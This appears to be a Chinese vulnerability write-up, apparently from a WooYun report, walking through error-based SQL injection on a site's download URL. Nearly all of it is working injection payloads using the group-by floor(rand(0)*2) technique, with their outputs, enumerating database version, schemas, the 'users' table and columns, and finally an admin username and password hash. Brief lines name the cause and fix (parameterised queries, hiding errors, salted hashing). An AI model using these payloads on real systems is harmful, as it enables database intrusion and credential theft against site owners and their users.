http://www.wooyun.org/bugs/wooyun-2010-01666
之前想找个测试 没想到这有 可以测试下做个记录而已
说明:下面的请求都是对 URL 路径中 id 段的报错注入,利用 group by floor(rand(0)*2) 引发的重复键错误,把子查询的结果带进页面回显的数据库错误信息。问题的根源应是 id 未经参数化就拼入 SQL,且数据库错误直接显示给用户;修复时应改用参数化查询并关闭错误回显。
http://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003
/data0/htdocs/leqi_new/app/myapp.php

或者

/**********version()**********/ 5.1.49-log
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********user()**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003

/**********database()**********/ leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
/**********limit依次递归爆库**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
information_schema
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
leqi
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
test

/**********limit依次递归爆表名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
users

/**********limit依次递归爆字段名**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
user_id,username,nickname,passwd,group_id
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 21
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
11 341 351 361
/**********爆数据**********/
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
admin
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
6a8b4574ca231eb8bd52764d4978ffcd
(32 位十六进制,形似未加盐的 MD5;口令应以带盐的慢哈希存储,如 bcrypt。)